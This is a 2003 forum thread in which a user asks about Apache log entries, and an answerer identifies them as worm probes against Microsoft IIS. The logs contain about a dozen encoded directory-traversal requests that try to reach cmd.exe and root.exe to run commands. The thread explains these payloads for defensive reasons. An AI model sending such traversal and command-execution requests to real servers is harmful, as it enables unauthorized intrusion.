Want to win a PS4? Go Premium and enter to win our High-Tech Treats giveaway. Enter to Win

x
?
Solved

apache logs

Posted on 2003-10-24
2
Medium Priority
?
267 Views
Last Modified: 2010-03-04
i have the following in my apache logs ... waht does this mean ?

pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:47 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236
pcp01484720pcs.limstn01.de.comcast.net - - [24/Oct/2003:17:18:48 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236

thanks in advance
0
Comment
Question by:sanctify
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
2 Comments
 
LVL 17

Accepted Solution

by:
dorward earned 200 total points
ID: 9619497
It means someone (or more likely someTHING [a worm]) is trying to exploit security holes in Microsoft's contribution to the webserver market.

Apache users don't need to worry about it, other then the slightly untity log files.

IIS users should switch to Apache (or install all the security patches).
0
 
LVL 1

Author Comment

by:sanctify
ID: 9621405
ok thanks .. its good to know im secure with apache
0

Featured Post

NEW Veeam Agent for Microsoft Windows

Backup and recover physical and cloud-based servers and workstations, as well as endpoint devices that belong to remote users. Avoid downtime and data loss quickly and easily for Windows-based physical or public cloud-based workloads!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

If your site has a few sections that need to be secure when data is transmitted between the server and local computer, such as a /order/ section for ordering or /customer/ which contains customer data, etc it would of course be recommended to secure…
It is possible to boost certain documents at query time in Solr. Query time boosting can be a powerful resource for finding the most relevant and "best" content. Of course the more information you index, the more fields you will be able to use for y…
Video by: ITPro.TV
In this episode Don builds upon the troubleshooting techniques by demonstrating how to properly monitor a vSphere deployment to detect problems before they occur. He begins the show using tools found within the vSphere suite as ends the show demonst…
Sometimes it takes a new vantage point, apart from our everyday security practices, to truly see our Active Directory (AD) vulnerabilities. We get used to implementing the same techniques and checking the same areas for a breach. This pattern can re…
Suggested Courses
Course of the Month11 days, 18 hours left to enroll

636 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question